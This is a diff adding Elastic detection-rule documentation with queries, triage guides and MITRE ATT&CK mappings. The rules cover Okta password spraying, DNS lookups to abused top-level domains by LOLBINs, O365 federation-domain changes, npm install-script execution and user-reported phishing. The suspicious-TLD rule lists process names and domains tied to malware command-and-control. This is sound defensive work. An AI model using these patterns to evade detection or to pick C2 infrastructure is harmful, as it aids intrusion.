@@ +[[prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address]] +=== Multiple Okta User Authentication Events with Client Address + +Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Okta User Authentication Events with Client Address* + + +This rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. + - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API. +- Examine the `okta.outcome.result` field to determine if the authentication was successful. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- A user may have legitimately started a session via a proxy for security or privacy reasons. +- Users may share an endpoint related to work or personal use in which separate Okta accounts are used. + - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons. + - Shared systems such as Kiosks and conference room computers may be used by multiple users. + - Shared working spaces may have a single endpoint that is used by multiple users. + + +*Response and remediation:* + +- Review the profile of the users involved in this action to determine if proxy usage may be expected. +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. +- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule. + - This will prevent future occurrences of this event for this device from triggering the rule. + - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action == "user.session.start" or event.action like "user.authentication.*") and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + okta.client.ip, + okta.actor.alternate_id, + okta.actor.id, + event.action, + okta.outcome.reason +| stats + Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id) + by + okta.client.ip, + okta.actor.alternate_id +| where + Esql.okta_actor_id_count_distinct > 5 +| sort + Esql.okta_actor_id_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc new file mode 100644 index 0000000000..53711bb8b5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc @@ -0,0 +1,160 @@ +[[prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash]] +=== Multiple Okta User Authentication Events with Same Device Token Hash + +Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Okta User Authentication Events with Same Device Token Hash* + + +This rule detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.debug_context.debug_data.dt_hash` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. +- Examine the `okta.outcome.result` field to determine if the authentication was successful. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- A user may have legitimately started a session via a proxy for security or privacy reasons. +- Users may share an endpoint related to work or personal use in which separate Okta accounts are used. + - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons. + - Shared systems such as Kiosks and conference room computers may be used by multiple users. + - Shared working spaces may have a single endpoint that is used by multiple users. + + +*Response and remediation:* + +- Review the profile of the users involved in this action to determine if proxy usage may be expected. +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. +- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule. + - This will prevent future occurrences of this event for this device from triggering the rule. + + +==== Setup + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action like "user.authentication.*" or event.action == "user.session.start") and + okta.debug_context.debug_data.dt_hash != "-" and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + event.action, + okta.debug_context.debug_data.dt_hash, + okta.actor.id, + okta.actor.alternate_id, + okta.outcome.reason +| stats + Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id) + by + okta.debug_context.debug_data.dt_hash, + okta.actor.alternate_id +| where + Esql.okta_actor_id_count_distinct > 20 +| sort + Esql.okta_actor_id_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc new file mode 100644 index 0000000000..4bd55c6733 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain]] +=== Network Activity to a Suspicious Top Level Domain + +Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.network-* +* logs-sentinel_one_cloud_funnel.* +* logs-crowdstrike.fdr* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cybercrimeinfocenter.org/top-20-tlds-by-malicious-phishing-domains + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Windows Security Event Logs +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Sysmon + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Network Activity to a Suspicious Top Level Domain* + + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes or malicious scripts. +- Review if the domain reputation and the frequency of network activities as well as any download/upload activity. +- Verify if the executed process is persistent on the host like common mechanisms Startup folder, task or Run key. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts. + + +*False positive analysis* + + +- Trusted domain from an expected process running in the environment. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Immediately block the identified indicators of compromise (IoCs). +- Implement any temporary network rules, procedures, and segmentation required to contain the attack. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Update firewall rules to be more restrictive. +- Reimage the host operating system or restore the compromised files to clean versions. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +network where host.os.type == "windows" and dns.question.name != null and + ( + process.name : ("MSBuild.exe", "mshta.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "msiexec.exe", "rundll32.exe", + "bitsadmin.exe", "InstallUtil.exe", "python.exe", "regsvr32.exe", "dllhost.exe", "node.exe", + "java.exe", "javaw.exe", "*.pif", "*.com", "*.scr") or + (?process.code_signature.trusted == false or ?process.code_signature.exists == false) or + ?process.code_signature.subject_name : ("AutoIt Consulting Ltd", "OpenJS Foundation", "Python Software Foundation") or + ?process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe") + ) and +dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)""" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: DNS +** ID: T1071.004 +** Reference URL: https://attack.mitre.org/techniques/T1071/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc new file mode 100644 index 0000000000..b863eb0cc5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-new-or-modified-federation-domain]] +=== New or Modified Federation Domain + +Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0 + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating New or Modified Federation Domain* + + +Federation domains enable trust between Office 365 and external identity providers, facilitating seamless authentication. Adversaries may exploit this by altering federation settings to redirect authentication flows, potentially gaining unauthorized access. The detection rule monitors specific actions like domain modifications, signaling potential privilege escalation attempts, and alerts analysts to investigate these changes. + + +*Possible investigation steps* + + +- Review the event logs for the specific actions listed in the query, such as "Set-AcceptedDomain" or "Add-FederatedDomain", to identify the exact changes made to the federation domain settings. +- Identify the user account associated with the event by examining the event logs, and verify if the account has the necessary permissions to perform such actions. +- Check the event.outcome field to confirm the success of the action and cross-reference with any recent administrative changes or requests to validate legitimacy. +- Investigate the event.provider and event.category fields to ensure the actions were performed through legitimate channels and not via unauthorized or suspicious methods. +- Analyze the timing and frequency of the federation domain changes to detect any unusual patterns or repeated attempts that could indicate malicious activity. +- Correlate the detected changes with any recent alerts or incidents involving privilege escalation or unauthorized access attempts to assess potential links or broader security implications. + + +*False positive analysis* + + +- Routine administrative changes to federation domains by IT staff can trigger alerts. To manage this, create exceptions for known and scheduled maintenance activities by trusted administrators. +- Automated scripts or tools used for domain management may cause false positives. Identify these scripts and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses. +- Integration of new services or applications that require federation domain modifications can be mistaken for suspicious activity. Document these integrations and adjust the rule to recognize these legitimate changes. +- Changes made during organizational restructuring, such as mergers or acquisitions, might appear as unauthorized modifications. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring thresholds or exclusions. +- Regular audits or compliance checks that involve domain settings adjustments can lead to false positives. Schedule these audits and inform the security team to prevent unnecessary alerts. + + +*Response and remediation* + + +- Immediately disable any newly added or modified federation domains to prevent unauthorized access. This can be done using the appropriate administrative tools in Office 365. +- Review and revoke any suspicious or unauthorized access tokens or sessions that may have been issued through the compromised federation domain. +- Conduct a thorough audit of recent administrative actions and access logs to identify any unauthorized changes or access patterns related to the federation domain modifications. +- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are necessary. +- Implement additional monitoring on federation domain settings to detect any further unauthorized changes promptly. +- Communicate with affected stakeholders and provide guidance on any immediate actions they need to take, such as password resets or additional authentication steps. +- Review and update federation domain policies and configurations to ensure they align with best practices and reduce the risk of similar incidents in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Set-AcceptedDomain" or +"Set-MsolDomainFederationSettings" or "Add-FederatedDomain" or "New-AcceptedDomain" or "Remove-AcceptedDomain" or "Remove-FederatedDomain") and +event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain or Tenant Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Trust Modification +** ID: T1484.002 +** Reference URL: https://attack.mitre.org/techniques/T1484/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc new file mode 100644 index 0000000000..0086776bba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution]] +=== Node.js Pre or Post-Install Script Execution + +This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=10s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "node" and process.args == "install"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc new file mode 100644 index 0000000000..db2ed8dd82 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish]] +=== O365 Email Reported by User as Malware or Phish + +Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Email Reported by User as Malware or Phish* + + +Microsoft 365's email services are integral to business communication, but they can be exploited by adversaries through phishing or malware-laden emails. Attackers may bypass security measures, reaching users who might unwittingly engage with malicious content. The detection rule leverages user reports of suspicious emails, correlating them with security events to identify potential threats, thus enhancing the organization's ability to respond to phishing attempts and malware distribution. + + +*Possible investigation steps* + + +- Review the details of the alert triggered by the rule "Email reported by user as malware or phish" in the SecurityComplianceCenter to understand the context and specifics of the reported email. +- Examine the event dataset from o365.audit to gather additional information about the email, such as sender, recipient, subject line, and any attachments or links included. +- Correlate the reported email with other security events or alerts to identify any patterns or related incidents that might indicate a broader phishing campaign or malware distribution attempt. +- Check the user's report against known phishing or malware indicators, such as suspicious domains or IP addresses, using threat intelligence sources to assess the credibility of the threat. +- Investigate the user's activity following the receipt of the email to determine if any actions were taken that could have compromised the system, such as clicking on links or downloading attachments. +- Assess the effectiveness of current security controls and awareness training by analyzing how the email bypassed existing defenses and was reported by the user. + + +*False positive analysis* + + +- User-reported emails from trusted internal senders can trigger false positives. Encourage users to verify the sender's identity before reporting and consider adding these senders to an allowlist if they are consistently flagged. +- Automated system notifications or newsletters may be mistakenly reported as phishing. Educate users on recognizing legitimate automated communications and exclude these sources from triggering alerts. +- Emails containing marketing or promotional content from known vendors might be reported as suspicious. Train users to differentiate between legitimate marketing emails and phishing attempts, and create exceptions for verified vendors. +- Frequent reports of emails from specific domains that are known to be safe can lead to unnecessary alerts. Implement domain-based exceptions for these trusted domains to reduce false positives. +- Encourage users to provide detailed reasons for reporting an email as suspicious, which can help in refining detection rules and reducing false positives over time. + + +*Response and remediation* + + +- Isolate the affected email account to prevent further interaction with potentially malicious content and to stop any ongoing unauthorized access. +- Quarantine the reported email and any similar emails identified in the system to prevent other users from accessing them. +- Conduct a thorough scan of the affected user's device and network for any signs of malware or unauthorized access, using endpoint detection and response tools. +- Reset the credentials of the affected user account and any other accounts that may have been compromised to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident, providing details of the threat and actions taken, to ensure coordinated response efforts. +- Review and update email filtering and security policies to address any identified gaps that allowed the malicious email to bypass existing controls. +- Monitor for any further suspicious activity related to the incident, using enhanced logging and alerting mechanisms to detect similar threats in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:"Email reported by user as malware or phish" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ 